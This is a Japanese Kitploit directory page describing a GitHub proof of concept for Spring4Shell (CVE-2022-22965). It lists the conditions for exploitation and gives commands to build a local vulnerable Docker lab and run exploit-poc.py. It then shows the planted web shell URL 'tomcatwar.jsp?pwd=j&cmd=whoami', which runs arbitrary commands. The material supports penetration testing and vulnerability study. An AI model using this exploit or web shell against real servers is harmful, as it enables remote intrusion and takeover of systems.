Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
Spring4shell-CVE-2022-22965-POC — 別の spring4shell (Spring core RCE) POC | Kitploit
ツール/GitHubGitHub/netcode/spring4shell-cve-2022-22965-poc
ペイロード生成脆弱性分析エクスプロイトウェブアプリケーション悪用ペネトレーションテストリモートアクセスツール
GitHubnetcode/spring4shell-cve-2022-22965-poc

Spring4shell-CVE-2022-22965-POC

別の spring4shell (Spring core RCE) POC

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有
リポジトリを見る
334年前未レビュー

Spring4shell RCE 脆弱性

この脆弱性は Spring Core に影響し、攻撃者が特別に細工された HTTP リクエストを送信することで、ライブラリの HTTP リクエストパーサーの保護をバイパスし、リモートコード実行を引き起こす可能性があります。

詳細情報はこちら

この脆弱性が悪用されるためには、いくつかの条件を満たす必要があります

  • JDK 9 以降を使用している
  • Apache Tomcat をサーブレットコンテナとして使用している
  • 従来の WAR としてパッケージ化されている(Spring Boot 実行可能 jar とは対照的)
  • spring-webmvc または spring-webflux の依存関係を使用している
  • Spring Framework バージョン 5.3.0 から 5.3.17、5.2.0 から 5.2.19、またはそれ以前のバージョンを使用している

POC

  • Docker イメージをビルド
root@kitploit:~
docker build . -t springshell-rce-poc
  • Docker コンテナを実行
root@kitploit:~
docker run --rm -p 8081:8080 --name springshell-rce-poc springshell-rce-poc
  • エクスプロイトの実行
root@kitploit:~
python exploit-poc.py --url "http://127.0.0.1:8081/"

期待される応答

root@kitploit:~
exploiting
Shell URL:http://127.0.0.1:8081/tomcatwar.jsp?pwd=j&cmd=whoami

この URL にアクセスすると、cmd=<任意のコマンド> で任意のコマンドを実行できます

コンテナに SSH 接続すると、新しいファイル tomcatwar.jsp が作成されていることを確認できます

root@kitploit:~
docker exec -it springshell-rce-poc /bin/bash
ls /usr/local/tomcat/webapps/ROOT
ツールをダウンロード